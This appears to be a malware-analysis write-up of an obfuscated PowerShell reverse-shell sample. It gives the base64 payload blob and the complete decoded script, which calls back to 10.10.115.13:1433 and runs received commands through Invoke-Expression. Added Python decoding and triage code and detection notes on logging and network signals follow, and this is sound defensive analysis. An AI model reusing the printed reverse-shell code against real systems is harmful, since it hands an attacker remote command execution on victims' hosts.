Malicious PowerShell Script
Last updated
Sample name - Malware.PSObfusc.ps1.malz
Malware type - Reverse shell
Script - The malware keeps its malicious part inside a base64 string, decodes it at run time and executes the result.
The base64 blob -
tVVpbxMxEP2cSv0PVhqhRLAm6cVRgVTSg0q91EScQsi7mSSmjr14vWlLyX/H115JKEUUJ9pj5s2befbYu7b2MKO+s7qyhh5k3M11Lq5A9sbAGLqAKcgEUL97jqYbeOuvuRZHeIOOpoSjHuURXP4b113Dcx1S9TYNkYRYJFQJeYOIQiOqxmmIIzF5SnUtQWJreRob4YkRHkgnPFBRjHOuAwCGhhIAKYEGghMFKKQqEpQb1s4b+elku//s8MXF6fNpSEI+/JBunmwfx6Mf6vv2x84m/i8aH2oYMvNrRIwCV+gVavCUMW1tJEoCmZQtYTocgixbriRVVcuAKFJ+l5CkrMyr9HLcrq4YKQ0aa0e908bm39nCnY2698RCmqDO5sbG6kqtqO4UroKz8BtESj8q3BPRJagE96O4ayFNzfnEhbd2TGShwnHgQ1A9a2s6QC6qRP3mRsHnL6jTXt+0GOCRGFA+qqL6cK3wbhJRuu/9FpzPSQl6dIZd0vfW2fRltUoBeDdV4oClydgUq2QKrjxdSqItbfM2EGbqanmIZWvWz3uv65YqBxRxPhO+ADJoerFPUFvPkXvGx8BHauzCa3SImj40GCnUbnm6Wr6u9v4Y5VPi51M/zbEbEs86M9cZuhpTBijTjvc00+6UUEZCBg75u/SV7LgvqV88H2GtTsdc2b7ZalZC3opHfCouIdi/jrUpoYKjoCsmE8IHXt/660cd9BOdpSpw2lwyrSEiKhovoWx8xfvXEcTKsC2LdLcuAyKDd0RSIxoFp2QCqG5y1j2wwZwOTenIvTDvtnrZMql6k4jU7pG2xxbdsBAI88uPblHRMhXXDpohYPp7UEawzJXRVzsyKz1Jw8T3hi0u74vWTh7oqn78yrsKR1bsvKdopMo8ZO7lU+wKqldWw7WlvhSM5d7T2PJ6V5YYH3EOsng90X1ERmBDhpQTxlzf2Vn3B0LAwR2Creom7jKRgO/nzLZHk7iwLpfkoFbSLEvlT7uFVH7LVVJl2/AeqRy0msofyQup/DFbSeVt90nloNVU/oheSOX71BLdSeqAVVK/dedJ/9g+OYE9Ke4Xnm9wE/y5d5MomODD7peXL7uCMf2BsNXPfgE=
We put this blob into a PowerShell variable -
We then decode it using -
write-host $megasus
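A way to recover the payload without executing it, as an added example that is not the author's decode commands or the sample's own code. It assumes the blob is base64 over raw deflate (what a .NET DeflateStream emits), zlib, gzip or plain text, tries each in turn and returns the script as data only. The blob it decodes is constructed inside the block; decode_payload is what you would point at the string above.

```python
import base64
import gzip
import zlib

# Decoders tried in order. Raw deflate (no header) is what .NET's
# DeflateStream produces; zlib and gzip cover loaders that use other
# stream classes; plain text is the fallback for uncompressed blobs.
_DECODERS = (
    ("raw-deflate", lambda b: zlib.decompress(b, -zlib.MAX_WBITS)),
    ("zlib", zlib.decompress),
    ("gzip", gzip.decompress),
    ("plain", lambda b: b),
)


def _looks_like_text(s: str) -> bool:
    """Reject decoder output that is binary noise rather than a script."""
    if not s:
        return False
    good = sum(1 for c in s if c.isprintable() or c in "\r\n\t")
    return good / len(s) > 0.95


def decode_payload(blob: str) -> tuple:
    """Base64-decode a loader blob and inflate it.

    Returns (method, script_text). Nothing here evaluates the result;
    the text is handed back for static inspection only.
    """
    raw = base64.b64decode("".join(blob.split()), validate=True)
    for name, fn in _DECODERS:
        try:
            out = fn(raw)
        except (zlib.error, OSError, EOFError):
            continue
        # .NET StreamReader output is usually UTF-8; UTF-16 is tried second.
        for enc in ("utf-8", "utf-16"):
            try:
                text = out.decode(enc)
            except UnicodeDecodeError:
                continue
            if _looks_like_text(text):
                return name, text
    raise ValueError("no decoder produced readable text")


def make_sample_blob() -> str:
    """Constructed stand-in for the page's blob: a harmless script
    compressed with raw deflate, the way a .NET DeflateStream writes it."""
    script = b'$ip = "192.0.2.10"\n$port = 4444\nWrite-Host "constructed sample"\n'
    comp = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)
    return base64.b64encode(comp.compress(script) + comp.flush()).decode("ascii")


if __name__ == "__main__":
    method, text = decode_payload(make_sample_blob())
    print(f"[{method}]")
    print(text)
```

Keeping the decode step separate from any Invoke-Expression is the whole point: the blob is just a container, and reading it with a decoder gives the same plaintext the loader would have fed to IEX, without running it.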
The malicious script in question -
#########################################################################
#                                                                       #
# PowerShell Reverse TCP v3.5                                           #
# by Ivan Sincek                                                        #
#                                                                       #
# GitHub repository at github.com/ivan-sincek/powershell-reverse-tcp.   #
# Feel free to donate bitcoin at 1BrZM6T7G9RN8vbabnfXu4M6Lpgztq6Y14.    #
#                                                                       #
#########################################################################
$client = $null;
$stream = $null;
$buffer = $null;
$writer = $null;
$data = $null;
$result = $null;
try {
    # C2 endpoint: the script connects back to the operator's listener
    $ip = "10.10.115.13"
    $port = 1433
    $client = New-Object Net.Sockets.TcpClient($ip, $port);
    $stream = $client.GetStream();
    $buffer = New-Object Byte[] 1024;
    $encoding = New-Object Text.AsciiEncoding;
    $writer = New-Object IO.StreamWriter($stream);
    $writer.AutoFlush = $true;
    $bytes = 0;
    do {
        # send a fake prompt, then read everything the operator typed
        $writer.Write("PS>");
        do {
            $bytes = $stream.Read($buffer, 0, $buffer.Length);
            if ($bytes -gt 0) {
                $data = $data + $encoding.GetString($buffer, 0, $bytes);
            }
        } while ($stream.DataAvailable);
        if ($bytes -gt 0) {
            $data = $data.Trim();
            if ($data.Length -gt 0) {
                # the received text is executed verbatim; errors are sent back too
                try {
                    $result = Invoke-Expression -Command $data 2>&1 | Out-String;
                } catch {
                    $result = $_.Exception | Out-String;
                }
                Clear-Variable -Name "data";
                $length = $result.Length;
                if ($length -gt 0) {
                    # stream the output back in buffer-sized chunks
                    $count = 0;
                    do {
                        if ($length -ge $buffer.Length) { $bytes = $buffer.Length; } else { $bytes = $length; }
                        $writer.Write($result.substring($count, $bytes));
                        $count += $bytes;
                        $length -= $bytes;
                    } while ($length -gt 0);
                    Clear-Variable -Name "result";
                }
            }
        }
    } while ($bytes -gt 0);   # a zero-byte read means the listener closed the connection
} catch {
    $_.Exception.InnerException.Message;
} finally {
    # tear down the socket and wipe every variable it used
    if ($writer -ne $null) {
        $writer.Close();
        $writer.Dispose();
        Clear-Variable -Name "writer";
    }
    if ($stream -ne $null) {
        $stream.Close();
        $stream.Dispose();
        Clear-Variable -Name "stream";
    }
    if ($client -ne $null) {
        $client.Close();
        $client.Dispose();
        Clear-Variable -Name "client";
    }
    if ($buffer -ne $null) {
        $buffer.Clear();
        Clear-Variable -Name "buffer";
    }
    if ($result -ne $null) {
        Clear-Variable -Name "result";
    }
    if ($data -ne $null) {
        Clear-Variable -Name "data";
    }
    [System.GC]::Collect();
}
This is a reverse TCP shell: it connects back to 10.10.115.13:1433, sends a fake "PS>" prompt, runs every line it receives through Invoke-Expression and writes the output back over the same socket. The base64 wrapper only hides the script on disk; once decoded, the connection and the command execution are as plain as in the unobfuscated original.
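A static triage pass over the decoded script, as an added example that is not part of the original write-up. The INDICATORS, ASSIGN and TCP_CALL patterns and the triage function are my own; the input is an excerpt of the script shown above, so the C2 it resolves is the page's 10.10.115.13:1433. The patterns follow one level of variable indirection, which is enough for this sample, where the host and port are assigned to $ip and $port and then passed to TcpClient.

```python
import re

# Excerpt of the decoded script shown above, used here as the input.
SAMPLE = r'''
$client = $null;
try {
$ip = "10.10.115.13"
$port = 1433
$client = New-Object Net.Sockets.TcpClient($ip, $port);
$stream = $client.GetStream();
$writer = New-Object IO.StreamWriter($stream);
$writer.Write("PS>");
$result = Invoke-Expression -Command $data 2>&1 | Out-String;
} catch {
}
'''

# Behaviours that, taken together, characterise an interactive reverse
# shell: an outbound socket, a stream on it, evaluation of received text,
# and a fake prompt written to the operator.
INDICATORS = {
    "tcp_client": re.compile(r"Net\.Sockets\.TcpClient", re.I),
    "net_stream": re.compile(r"\.GetStream\(\)", re.I),
    "eval": re.compile(r"\b(Invoke-Expression|IEX)\b", re.I),
    "prompt": re.compile(r'Write\("PS>"\)'),
}

# Simple literal assignments: $name = "str", 'str' or 1234
ASSIGN = re.compile(r'\$(\w+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|(\d+))\s*;?\s*$', re.M)
TCP_CALL = re.compile(r"TcpClient\(\s*([^,)]+?)\s*,\s*([^)]+?)\s*\)", re.I)


def _resolve(token: str, assigns: dict) -> str:
    """Turn a call argument into its literal value, following one level
    of variable indirection ($ip -> "10.10.115.13")."""
    token = token.strip()
    if token.startswith("$"):
        return assigns.get(token[1:], token)
    return token.strip("\"'")


def triage(script: str) -> dict:
    """Static check of a decoded PowerShell script for reverse-shell
    behaviour. Returns indicator hits, the C2 (host, port) if it can be
    resolved from literal assignments, and a coarse verdict."""
    assigns = {}
    for m in ASSIGN.finditer(script):
        assigns[m.group(1)] = next(g for g in m.groups()[1:] if g is not None)
    hits = {name: bool(rx.search(script)) for name, rx in INDICATORS.items()}
    c2 = None
    m = TCP_CALL.search(script)
    if m:
        host = _resolve(m.group(1), assigns)
        port = _resolve(m.group(2), assigns)
        c2 = (host, int(port) if port.isdigit() else port)
    if hits["tcp_client"] and hits["eval"]:
        verdict = "reverse-shell"
    elif any(hits.values()):
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"indicators": hits, "c2": c2, "verdict": verdict}


if __name__ == "__main__":
    print(triage(SAMPLE))
```

Two points for detection follow from the script itself. Because the loader hands the decoded text to Invoke-Expression, PowerShell script block logging (event ID 4104) records the plaintext on the host even though only the base64 blob is on disk, so the TcpClient and Invoke-Expression strings above are searchable in that log. On the network side, 1433 is the default Microsoft SQL Server port, so an outbound connection to it from a workstation running powershell.exe is the signal, not the port number alone.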